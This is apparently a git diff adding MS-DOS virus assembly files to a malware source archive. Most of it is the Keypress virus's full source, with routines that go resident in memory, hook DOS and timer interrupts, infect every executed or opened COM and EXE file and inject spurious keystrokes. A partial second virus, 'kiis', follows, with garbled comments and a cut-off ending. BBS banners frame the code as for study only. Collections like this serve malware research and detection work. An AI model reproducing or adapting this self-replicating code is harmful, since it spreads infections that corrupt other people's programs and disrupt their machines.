mov di,si + mov cx,[VirSize] ; CX = virussize + cld + repz ; Copy virus to virus-segment + movsb + clc ; No error, virus installed + ret + + +;*** Install new interrupts (1C - Timer Tick, 21 - DOS) *** + +Inst_Ints: push es + pop ds + mov word ptr [Ticks],0 + mov ax,351Ch ; Get Addr Timer Tick + int 21h + mov I1c_ofs,bx + mov I1c_seg,es + mov ax,3521h ; Get Addr DOS-Int + int 21h + mov I21_ofs,bx + mov I21_seg,es + mov ax,251Ch + mov dx,offset New_I1c + int 21h ; Install New Timer-Tick Int + mov dx,offset I21_dos12 + push dx + mov ah,30h ; Get DOS-Version + int 21h + pop dx + cmp al,3 ; Below 3.0? + jb DosBel3 + mov dx,offset new_I21 ; No, new int +DosBel3: mov ax,2521h ; Install new DOS-Int + int 21h + push cs + pop ds + ret + + +;*** Proc: NEW 1C (TIMER TICK) INTERRUPT *** +; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the +; keyboard-interrupt. + +Ticks dw (?) + +New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus loaded' + cmp word ptr cs:[Ticks],2A30h ; 10 minutes passed? + jb org_I1c ; No, go to orig. I1c + cmp word ptr cs:[Ticks],2A54h ; 2 sec. passed? + jbe screw_keys ; Not yet, give ESCs + mov word ptr cs:[Ticks],0 ; Time-counter to 0 + jmp short Org_I1c ; Go to orig. I1c +Screw_Keys: push cx + mov cx,5 ; 5 times / tick +Put_Key: int 9 ; Give extra key + loop Put_key + pop cx +Org_I1c: db 0EAh ; Jump far to orig. I1c +I1c_Ofs dw (?) +I1c_Seg dw (?) + +New_I24: mov al,0 + +New_I23: iret + +I23_Ofs dw (?) +I23_Seg dw (?) + +I24_Ofs dw (?) +I24_Seg dw (?) + +ProgSize dw (?) ; Program size in paragraphs + +New_I21: cmp ax,4B00h ; New DOS Int for DOS 3 + + jz Is_Start + jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I 21 +Is_Start: call Save_Regs + call InstCritInt ; Install new ^c and crit. err. int + mov ax,3D02h ; Open file for read and write + mov ds,R_Ds + int 21h + push cs + pop ds + jc Close_File + mov bx,ax + call Read_header + jc Close_File + call Write_virus + jc Close_File + call Write_header +Close_File: mov ah,3Eh ; Close file + int 21h + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp far dword ptr cs:[I21_Ofs] + +I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and 2.x + jz Is_Open + +JmpDos: db 0EAh ; Jump Far +I21_Ofs dw (?) +I21_Seg dw (?) + +Is_Open: push ax ; Network-flags? + and al,0FCh + pop ax + jnz JmpDos ; Yes -> DOS + + call Save_Regs + + call InstCritInt ; Install new ^c and crit. err. int + + mov DS,R_Ds + or al,2 ; Write access + pushf + cli + call far cs:[I21_Ofs] ; Open file + push cs + pop ds + jc Open_Error ; Error opening -> DOS + + pushf + mov [R_Ax],ax ; Save handle + mov bx,ax + + call Chk_Inf ; Check infection is possible + jc No_Infect ; No -> quit + + call Read_header + jc No_Infect + + call Write_virus + jc No_Infect + call Write_header +No_Infect: call Go_file_beg ; Go to begin of file + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + popf + retf 2 +Open_Error: call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp short JmpDos + + +;*** Proc: Buffer for header of program to infect *** + +Head_buf dw 0Ch dup (?) + + +;*** Proc: Install new ^C and crit. err. interrupt *** + +InstCritInt: push ax + push bx + push dx + push ds + push es + push cs + pop ds + mov ax,3523h ; Get Ctrl-Break Int Addr + int 21h + mov I23_Ofs,bx + mov I23_Seg,es + mov ax,3524h ; Get Crit. Err Int Addr + int 21h + mov I24_Ofs,bx + mov I24_Seg,es + mov ax,2523h + mov dx,offset New_I23 ; Install new Ctrl-Break Int + int 21h + mov ax,2524h ; Install new Crit. Err Int + mov dx,offset New_I24 + int 21h + pop es + pop ds + pop dx + pop bx + pop ax + ret + + +;*** Proc: Restore orig. ctrl-break and crit. err. interrupt *** + +RestCritInt: mov ax,2524h ; Rest. orig. crit. err int + lds dx,dword ptr cs:[I24_Ofs] + int 21h + mov ax,2523h ; Rest. orig. ctrl-break int + lds dx,dword ptr cs:[I23_Ofs] + int 21h + push cs + pop ds + ret + + +;*** Read header of file *** + +Read_header: mov ah,3Fh + mov dx,offset Head_buf + mov cx,18h + int 21h + jc HeadRead_Err ; Error reading, don't infect + + call Check_infect ; Check file already infected; if not, save data + jc HeadRead_Err ; Error, quit + + call Calc_data ; Calculate data for infected file + jc HeadRead_Err ; Error, quit + +HeadRead_Err: ret + + +;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus *** + +Write_virus: mov ah,40h ; Write virus behind program + mov cx,[VirSize] + mov dx,100h + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + test byte ptr [Com_or_exe],1 + jz First_Write + ret + +First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind virus + mov cx,10h + mov dx,offset Head_buf + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + clc ; End procedure, no error + ret + +Err_Writ: stc ; End procedure, error + ret + + +;*** Proc: .COM: Write jump-to-virus, .EXE: Write header *** + +Write_header: call Go_file_beg ; Go to begin of file + test byte ptr [Com_or_exe],1 ; .EXE-file? + jnz Exe_header + mov ah,40h ; .COM file - Write 'EB 02' + mov cx,2 + mov dx,offset EB02 + int 21h + mov ah,40h ; Write program-size in pars + mov cx,2 + mov dx,offset ProgSize + int 21h + mov ah,40h ; Write rest of begin of virus + mov cx,0Ch + mov dx,104h + int 21h + ret + +Exe_header: mov ah,40h ; Write in File + mov cx,18h + mov dx,offset Head_buf + int 21h + ret + + +;*** Proc: Change file pointer *** + +Cng_file_ptr: mov ax,4200h + int 21h + ret + + +;*** Proc: Go to begin of file *** + +Go_file_beg: xor cx,cx ; Filepointer = 0 + xor dx,dx + call Cng_file_ptr ; Change File Pointer + ret + + +;*** Proc: Check file is already infected *** + +Check_infect: mov si,104h + mov di,offset Head_buf+4 + push cs + pop es + mov byte ptr [Com_or_exe],0 ; Flag for .COM + cmp word ptr [di-04],5A4Dh ; Is .EXE? + jz Is_Exe + mov cx,0Ch ; No, .COM file + cld + repz ; Already infected? + cmpsb + jnz Do_Infect ; Not yet +Dont_Infect: stc + ret +Do_Infect: clc + ret +Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for .EXE + mov cx,[offset Head_buf+14h] ; cx = Prog-IP + cmp cx,offset VirBegin ; Same as Vir-IP? + jz Dont_Infect ; Yes, quit + cmp word ptr [offset Head_buf+0Ch],0 ; Max extra pars=0? + jz Dont_Infect ; Yes, quit + mov [Exe_ip],cx ; Save prog-IP + mov cx,[Head_buf+16h] + mov [Exe_cs],cx ; Save prog-cs + mov cx,[Head_buf+0Eh] + mov [R_ss],cx ; Save prog-SS + mov cx,[Head_buf+10h] + mov [R_sp],cx ; Save prog-SP + jmp short Do_Infect + + +;*** Proc: Calculate data for infection *** + +Calc_data: mov ax,4202h ; Go to EOF + xor cx,cx + xor dx,dx + int 21h + test al,0Fh ; Size mod 16 = 0 (File is exact x paragraps)? + jz No_par_add ; Yes, no extra par added + add ax,10h ; Add paragraph + adc dx,0 ; Overflow -> Inc dx + and ax,0FFF0h ; Make paragraphs +No_par_add: test byte ptr [Com_or_exe],1 + jnz Calc_exe + or dx,dx + jnz not_infect + cmp ax,[maxcomsize] ; File too big? + ja not_infect ; Yes, quit + cmp ax,[VirSize] ; File too small? + jbe Not_Infect ; Yes, quit + mov [ProgSize],ax ; Save program-size + mov cl,4 + shr word ptr [ProgSize],cl ; In paragraphs + mov dx,ax + xor cx,cx + call Cng_file_ptr ; Go to EOF + clc + ret +Not_Infect: stc + ret + +Calc_exe: push ax + push dx + add ax,100h ; 100 bytes stack + adc dx,0 ; Overflow - inc dx + mov cx,dx + mov dx,ax + call Cng_file_ptr ; Go to EOF + push bx + add ax,[VirSize] ; New exe-length + adc dx,0 + mov bx,200h ; For header: / 512 + div bx + or dx,dx + jz No_Correct + inc ax ; Files below 2.000.000h bytes - length correction +No_Correct: mov [Head_buf+2],dx ; Save new file-length + mov [Head_buf+4],ax ; ' ' ' ' ' ' ' ' + pop bx + pop dx + pop ax + call Calc_cs_ss + mov word ptr [Head_buf+10h],100h ; Prog-SP=100h + mov word ptr [Head_buf+14h],offset VirBegin ; Set prog-IP + clc + ret + + +;*** Proc: Calculate new CS and SS for .EXE file *** + +Calc_cs_ss: push cx + mov cx,4 +Cs_ss_lp: shr dx,1 + rcr ax,1 + loop Cs_ss_lp + sub ax,[Head_buf+8] ; Size of header + sbb dx,0 + mov [Head_buf+0Eh],ax ; Save prog-SS + mov [Head_buf+16h],ax ; Save prog-cs + pop cx + ret + + +;*** Check infection is possible *** + +Chk_Inf: call Chk_exec ; Check file is executable + jb Not_exec + call Get_attr ; Check file has no SYS attr +Not_Exec: ret + + +;*** Search-paths *** + +Com_path db '.COM',0 + +Exe_path db '.EXE',0 + + +;*** Check file is executable (.COM / .EXE) + +Chk_Exec: push es + mov es,R_ds + mov di,dx + xor al,al + mov cx,80h + cld + repnz ; Search '.' + scasb + jnz not_inf ; No '.' found + dec di + push di + mov si,offset Com_path+4 + mov cx,4 + std + repz ; Check '.COM' + cmpsb + pop di + jnz no_com ; No .COM + clc + jmp short Infect + nop +Not_Inf: stc + +Infect: cld + pop es + ret +No_Com: mov si,offset Exe_path+4 + mov cx,4 + repz ; Check '.EXE' + cmpsb + jnz not_inf ; No .EXE either - not executable + clc + jmp short infect + +Get_Attr: push ds + mov ax,4300h ; Get FileAttr + xor cx,cx + mov ds,R_ds + int 21h + pop ds + jb Bad_Attr ; Error - don't infect + test cx,4 ; System-Attr? + jnz Bad_Attr ; Yes, don't infect + clc + ret + +Bad_Attr: stc + ret + +First_bytes: int 20h ; First bytes of orig. program - here just 'Go to DOS' + dw (?) + mov bx,cs ; Overwrites the begin + add bx,[102h] + push bx + mov bx,offset VirBegin + push bx + retf + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.keypress.err b/MSDOS/Virus.MSDOS.Unknown.keypress.err new file mode 100644 index 00000000..dfa93406 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.keypress.err @@ -0,0 +1,739 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;******************************************************** +; Source code of the Keypress Virus - Made by XSTC +; Made in A86 v3.07 +; +; The Keypress Virus installs itself in top of DOS +; memory, without using DOS resident functions. It will +; hook int 1Ch (timer) and 21h (DOS) and will copy every +; 10 minutes during 2 seconds the keys you press five +; times (so if you press '1' it will be '111111') - if +; you press no key, it will usually give ESCs. +; +; In DOS 3+ it spreads to every file executed - so it +; can, besides COM/EXE, infect DRV/OVL/etc. +; It also spreads itself in DOS 1 and 2 with a special +; routine - in this case only COM/EXE files will be +; infected. +; +; It adds, after making full paragraphs of the file +; length, 1232 bytes to COM-files and 1216 to EXE. +; +; This code is only made to show the possibilities and +; dangers of a virus. It is only intended for research +; purposes - spreading a virus is prohibited by law. +; +; NOTE - The compiled code is not 100% compatible with +; the Keypress virus. A86 compiles the 'ADD BX,AX' and +; 'MOV DI,SI' different. This has totally no effect +; on the program. +;******************************************************** + +; After compiling the new virus, enter the new size in paragraphs in VirParSize +; and compile again. + +VirParSize equ 4Ch ; Size of the original KeyPress virus + +VirStart: jmp long VirBegin + db 0 + +ComStart: mov bx,cs ; When the virus has infected a .COM file, + add bx,[102h] ; this is the jump to the virus. Actually, + push bx ; this code is overwritten with the code + mov bx,offset VirBegin ; in the end of the virus. + push bx + retf + +EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM file + +VirSize dw VirParSize shl 4 ; Size of virus in whole pars + +VirPars dw VirParSize + 1 ; Size of virus in pars+1 + +MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h stack) + +Com_or_exe db 00h ; 0 = Com-File, 1 = Exe-File +R_Ax dw (?) +R_Bx dw (?) +R_Cx dw (?) +R_Dx dw (?) +R_Di dw (?) +R_Si dw (?) +R_Bp dw (?) +R_Es dw (?) +R_Ds dw (?) +R_SS dw (?) +R_SP dw (?) + +Exe_CS dw (?) +Exe_IP dw (?) + + +VirBegin: call Save_Regs ; Start of virus + call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE files) + call Get_cs_ip ; Get CS and IP of original prog + call Check_res ; Check virus already resident + jb Exit_inst ; Yes, quit + + call Inst_mem ; Install in memory + jb Exit_inst ; Error, quit + + call Inst_ints ; Hook interrupts +Exit_Inst: jmp short Rst_regs_prg + nop + +Jmp_Prg: db 0EAh ; Jump to original program +PrgOfs dw (?) +PrgSeg dw (?) + +Check_res: push ds + xor bx,bx + mov ds,bx + mov bx,600h ; Unused word in memory + cmp word ptr [bx],1 ; Already installed? + jz Installed ; Yes + + mov word ptr [bx],1 ; No + stc + +Installed: cmc + pop ds + ret + + +;*** For .EXE: Fix orig-prog CS and SS *** + +Fix_cs_ss: test byte ptr [Com_or_exe],1 + jz no_exe + + mov ax,es + add ax,10h + add Exe_cs,ax + add R_ss,ax + +No_Exe: ret + + +;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes *** + +Get_cs_ip: mov ax,[Exe_cs] + mov bx,[Exe_ip] + test byte ptr [Com_or_exe],1 + jnz No_rest ; .EXE file: no restore of first bytes + + mov ax,es + mov bx,100h + mov cx,10h + mov si,offset First_bytes + mov di,100h + cld + repz ; Restore first 16 bytes (.COM file) + movsb + +No_rest: mov [Prgseg],ax + mov [Prgofs],bx + ret + + +;*** Proc: Save the registers to restore them after the virus has ended *** + +Save_Regs: mov cs:R_ds,ds + push cs + pop ds + mov R_ax,ax + mov R_bx,bx + mov R_cx,cx + mov R_dx,dx + mov R_di,di + mov R_si,si + mov R_bp,bp + mov R_es,es + ret + + +;*** Restore regs for original program *** + +Rst_regs_prg: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + test byte ptr [Com_or_exe],1 + jz No_StackRest ; No stack restore for .COM files + + cli + mov ss,[R_ss] ; Restore .EXE stack + mov sp,[R_sp] + sti + +No_StackRest: mov ds,R_ds + jmp short jmp_prg + + +;*** Restore regs for interrupts *** + +Rst_regs_int: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + mov ds,R_ds + ret + + +;*** Proc: Search for last MCB *** + +Last_MCB: push ds + mov bx,es + dec bx + +Next_MCB: mov ds,bx + cmp byte ptr [0],5Ah ; Last MCB? + jz Is_last ; Yes + inc bx + add bx,[3] ; Go to next + cmp bx,0A000h ; In ROM? + jb Next_MCB ; No, try next one + +Is_Last: pop ds + ret + + +;*** Proc: Install virus in end of memory *** + +Inst_Mem: call Last_mcb ; Search last MCB + cmp bx,0A000h ; In ROM? + jb Not_ROM ; No, continue + +No_Inst: push cs ; Yes, quit + pop ds + stc ; Error, virus not installed + ret + +Not_ROM: mov ds,bx + mov ax,[3] ; AX = Size last MCB + sub ax,cs:[VirPars] ; - (Virussize in pars+1) + jbe no_inst ; Not enough memory, quit + cmp ax,800h + jb no_inst ; Less than 2048 pars free, quit + mov [3],ax ; Give program less space to install virus + add bx,ax + inc bx ; BX = seg where virus comes + mov es:[2],bx ; Enter in PSP, program not allowed there + sub bx,10h ; - 10h pars (virus starts at 100h) + push bx + push cs + pop ds + pop es + mov si,100h + mov di,si + mov cx,[VirSize] ; CX = virussize + cld + repz ; Copy virus to virus-segment + movsb + clc ; No error, virus installed + ret + + +;*** Install new interrupts (1C - Timer Tick, 21 - DOS) *** + +Inst_Ints: push es + pop ds + mov word ptr [Ticks],0 + mov ax,351Ch ; Get Addr Timer Tick + int 21h + mov I1c_ofs,bx + mov I1c_seg,es + mov ax,3521h ; Get Addr DOS-Int + int 21h + mov I21_ofs,bx + mov I21_seg,es + mov ax,251Ch + mov dx,offset New_I1c + int 21h ; Install New Timer-Tick Int + mov dx,offset I21_dos12 + push dx + mov ah,30h ; Get DOS-Version + int 21h + pop dx + cmp al,3 ; Below 3.0? + jb DosBel3 + mov dx,offset new_I21 ; No, new int +DosBel3: mov ax,2521h ; Install new DOS-Int + int 21h + push cs + pop ds + ret + + +;*** Proc: NEW 1C (TIMER TICK) INTERRUPT *** +; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the +; keyboard-interrupt. + +Ticks dw (?) + +New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus loaded' + cmp word ptr cs:[Ticks],2A30h ; 10 minutes passed? + jb org_I1c ; No, go to orig. I1c + cmp word ptr cs:[Ticks],2A54h ; 2 sec. passed? + jbe screw_keys ; Not yet, give ESCs + mov word ptr cs:[Ticks],0 ; Time-counter to 0 + jmp short Org_I1c ; Go to orig. I1c +Screw_Keys: push cx + mov cx,5 ; 5 times / tick +Put_Key: int 9 ; Give extra key + loop Put_key + pop cx +Org_I1c: db 0EAh ; Jump far to orig. I1c +I1c_Ofs dw (?) +I1c_Seg dw (?) + +New_I24: mov al,0 + +New_I23: iret + +I23_Ofs dw (?) +I23_Seg dw (?) + +I24_Ofs dw (?) +I24_Seg dw (?) + +ProgSize dw (?) ; Program size in paragraphs + +New_I21: cmp ax,4B00h ; New DOS Int for DOS 3 + + jz Is_Start + jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I 21 +Is_Start: call Save_Regs + call InstCritInt ; Install new ^c and crit. err. int + mov ax,3D02h ; Open file for read and write + mov ds,R_Ds + int 21h + push cs + pop ds + jc Close_File + mov bx,ax + call Read_header + jc Close_File + call Write_virus + jc Close_File + call Write_header +Close_File: mov ah,3Eh ; Close file + int 21h + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp far dword ptr cs:[I21_Ofs] + +I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and 2.x + jz Is_Open + +JmpDos: db 0EAh ; Jump Far +I21_Ofs dw (?) +I21_Seg dw (?) + +Is_Open: push ax ; Network-flags? + and al,0FCh + pop ax + jnz JmpDos ; Yes -> DOS + + call Save_Regs + + call InstCritInt ; Install new ^c and crit. err. int + + mov DS,R_Ds + or al,2 ; Write access + pushf + cli + call far cs:[I21_Ofs] ; Open file + push cs + pop ds + jc Open_Error ; Error opening -> DOS + + pushf + mov [R_Ax],ax ; Save handle + mov bx,ax + + call Chk_Inf ; Check infection is possible + jc No_Infect ; No -> quit + + call Read_header + jc No_Infect + + call Write_virus + jc No_Infect + call Write_header +No_Infect: call Go_file_beg ; Go to begin of file + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + popf + retf 2 +Open_Error: call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp short JmpDos + + +;*** Proc: Buffer for header of program to infect *** + +Head_buf dw 0Ch dup (?) + + +;*** Proc: Install new ^C and crit. err. interrupt *** + +InstCritInt: push ax + push bx + push dx + push ds + push es + push cs + pop ds + mov ax,3523h ; Get Ctrl-Break Int Addr + int 21h + mov I23_Ofs,bx + mov I23_Seg,es + mov ax,3524h ; Get Crit. Err Int Addr + int 21h + mov I24_Ofs,bx + mov I24_Seg,es + mov ax,2523h + mov dx,offset New_I23 ; Install new Ctrl-Break Int + int 21h + mov ax,2524h ; Install new Crit. Err Int + mov dx,offset New_I24 + int 21h + pop es + pop ds + pop dx + pop bx + pop ax + ret + + +;*** Proc: Restore orig. ctrl-break and crit. err. interrupt *** + +RestCritInt: mov ax,2524h ; Rest. orig. crit. err int + lds dx,dword ptr cs:[I24_Ofs] + int 21h + mov ax,2523h ; Rest. orig. ctrl-break int + lds dx,dword ptr cs:[I23_Ofs] + int 21h + push cs + pop ds + ret + + +;*** Read header of file *** + +Read_header: mov ah,3Fh + mov dx,offset Head_buf + mov cx,18h + int 21h + jc HeadRead_Err ; Error reading, don't infect + + call Check_infect ; Check file already infected; if not, save data + jc HeadRead_Err ; Error, quit + + call Calc_data ; Calculate data for infected file + jc HeadRead_Err ; Error, quit + +HeadRead_Err: ret + + +;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus *** + +Write_virus: mov ah,40h ; Write virus behind program + mov cx,[VirSize] + mov dx,100h + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + test byte ptr [Com_or_exe],1 + jz First_Write + ret + +First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind virus + mov cx,10h + mov dx,offset Head_buf + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + clc ; End procedure, no error + ret + +Err_Writ: stc ; End procedure, error + ret + + +;*** Proc: .COM: Write jump-to-virus, .EXE: Write header *** + +Write_header: call Go_file_beg ; Go to begin of file + test byte ptr [Com_or_exe],1 ; .EXE-file? + jnz Exe_header + mov ah,40h ; .COM file - Write 'EB 02' + mov cx,2 + mov dx,offset EB02 + int 21h + mov ah,40h ; Write program-size in pars + mov cx,2 + mov dx,offset ProgSize + int 21h + mov ah,40h ; Write rest of begin of virus + mov cx,0Ch + mov dx,104h + int 21h + ret + +Exe_header: mov ah,40h ; Write in File + mov cx,18h + mov dx,offset Head_buf + int 21h + ret + + +;*** Proc: Change file pointer *** + +Cng_file_ptr: mov ax,4200h + int 21h + ret + + +;*** Proc: Go to begin of file *** + +Go_file_beg: xor cx,cx ; Filepointer = 0 + xor dx,dx + call Cng_file_ptr ; Change File Pointer + ret + + +;*** Proc: Check file is already infected *** + +Check_infect: mov si,104h + mov di,offset Head_buf+4 + push cs + pop es + mov byte ptr [Com_or_exe],0 ; Flag for .COM + cmp word ptr [di-04],5A4Dh ; Is .EXE? + jz Is_Exe + mov cx,0Ch ; No, .COM file + cld + repz ; Already infected? + cmpsb + jnz Do_Infect ; Not yet +Dont_Infect: stc + ret +Do_Infect: clc + ret +Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for .EXE + mov cx,[offset Head_buf+14h] ; cx = Prog-IP + cmp cx,offset VirBegin ; Same as Vir-IP? + jz Dont_Infect ; Yes, quit + cmp word ptr [offset Head_buf+0Ch],0 ; Max extra pars=0? + jz Dont_Infect ; Yes, quit + mov [Exe_ip],cx ; Save prog-IP + mov cx,[Head_buf+16h] + mov [Exe_cs],cx ; Save prog-cs + mov cx,[Head_buf+0Eh] + mov [R_ss],cx ; Save prog-SS + mov cx,[Head_buf+10h] + mov [R_sp],cx ; Save prog-SP + jmp short Do_Infect + + +;*** Proc: Calculate data for infection *** + +Calc_data: mov ax,4202h ; Go to EOF + xor cx,cx + xor dx,dx + int 21h + test al,0Fh ; Size mod 16 = 0 (File is exact x paragraps)? + jz No_par_add ; Yes, no extra par added + add ax,10h ; Add paragraph + adc dx,0 ; Overflow -> Inc dx + and ax,0FFF0h ; Make paragraphs +No_par_add: test byte ptr [Com_or_exe],1 + jnz Calc_exe + or dx,dx + jnz not_infect + cmp ax,[maxcomsize] ; File too big? + ja not_infect ; Yes, quit + cmp ax,[VirSize] ; File too small? + jbe Not_Infect ; Yes, quit + mov [ProgSize],ax ; Save program-size + mov cl,4 + shr word ptr [ProgSize],cl ; In paragraphs + mov dx,ax + xor cx,cx + call Cng_file_ptr ; Go to EOF + clc + ret +Not_Infect: stc + ret + +Calc_exe: push ax + push dx + add ax,100h ; 100 bytes stack + adc dx,0 ; Overflow - inc dx + mov cx,dx + mov dx,ax + call Cng_file_ptr ; Go to EOF + push bx + add ax,[VirSize] ; New exe-length + adc dx,0 + mov bx,200h ; For header: / 512 + div bx + or dx,dx + jz No_Correct + inc ax ; Files below 2.000.000h bytes - length correction +No_Correct: mov [Head_buf+2],dx ; Save new file-length + mov [Head_buf+4],ax ; ' ' ' ' ' ' ' ' + pop bx + pop dx + pop ax + call Calc_cs_ss + mov word ptr [Head_buf+10h],100h ; Prog-SP=100h + mov word ptr [Head_buf+14h],offset VirBegin ; Set prog-IP + clc + ret + + +;*** Proc: Calculate new CS and SS for .EXE file *** + +Calc_cs_ss: push cx + mov cx,4 +Cs_ss_lp: shr dx,1 + rcr ax,1 + loop Cs_ss_lp + sub ax,[Head_buf+8] ; Size of header + sbb dx,0 + mov [Head_buf+0Eh],ax ; Save prog-SS + mov [Head_buf+16h],ax ; Save prog-cs + pop cx + ret + + +;*** Check infection is possible *** + +Chk_Inf: call Chk_exec ; Check file is executable + jb Not_exec + call Get_attr ; Check file has no SYS attr +Not_Exec: ret + + +;*** Search-paths *** + +Com_path db '.COM',0 + +Exe_path db '.EXE',0 + + +;*** Check file is executable (.COM / .EXE) + +Chk_Exec: push es + mov es,R_ds + mov di,dx + xor al,al + mov cx,80h + cld + repnz ; Search '.' + scasb + jnz not_inf ; No '.' found + dec di + push di + mov si,offset Com_path+4 + mov cx,4 + std + repz ; Check '.COM' + cmpsb + pop di + jnz no_com ; No .COM + clc + jmp short Infect + nop +Not_Inf: stc + +Infect: cld + pop es + ret +No_Com: mov si,offset Exe_path+4 + mov cx,4 + repz ; Check '.EXE' + cmpsb + jnz not_inf ; No .EXE either - not executable + clc + jmp short infect + +Get_Attr: push ds + mov ax,4300h ; Get FileAttr + xor cx,cx + mov ds,R_ds + int 21h + pop ds + jb Bad_Attr ; Error - don't infect + test cx,4 ; System-Attr? + jnz Bad_Attr ; Yes, don't infect + clc + ret + +Bad_Attr: stc + ret + +First_bytes: int 20h ; First bytes of orig. program - here just 'Go to DOS' + dw (?) + mov bx,cs ; Overwrites the begin + add bx,[102h] + push bx + mov bx,offset VirBegin + push bx + retf + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.kiis.asm b/MSDOS/Virus.MSDOS.Unknown.kiis.asm new file mode 100644 index 00000000..2fa384b9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kiis.asm @@ -0,0 +1,269 @@ + +;************************************************************************; +;* T®§¨ Virus ¥ ­ ¯° ¢¥­ ­  25.10.1991 £. ¢ *; +;* *; +;* ‘“ " ‘¢. Š«¨¬¥­² Žµ°¨¤±ª¨ " ¢ 17:18.30 hour *; +;* *; +;* ±² ¿ 316 ­  ”.Œ.ˆ. *; +;************************************************************************; + +start: jmp short begin + db (00h) + db (53h) ; ‡  ° §¯®§­ ¢ ­¥ ­  ¢¨°³±  + db (4bh) ; „ «¨ ´ ©«  ¥ § ° §¥­ + int 20h +okey: db (0b8h) + db (03h) + db (00h) + db (0cdh) + db (10h) + +begin: push cx ; + CALL F1 ; +F1: POP SI ; ‡  ¢º§±² ­®¢¿¢ ­¥ ­  ¯º°¢¨²¥ 5 ¡ ©²  + SUB SI,09 ; + PUSH SI ; + cld ; + mov di,100h ; + mov cx,5 ; + rep movsb ; + jmp ding2 + +new21: pushf ; CALL ªº¬ ®°¨£¨­ «­®²® INT 21h ­  + push cs ; IBMDOS.COM - ± ¶¥« ¤  ­¥ ²¥ µ¢ - + call Word ptr cs:[8c0h] ; ­ ² ­¿ª®© ¯°®£° ¬¨ §  ¢¨°³±¨ + ret ; ª ²® Anti4us.exe, NDD ¨ ².­. + +int21h: STI + cmp ah,4bh ; °¨ ±² °²¨° ­¥ ­  ´ ©« + jz mm ; + cmp ah,11h ; 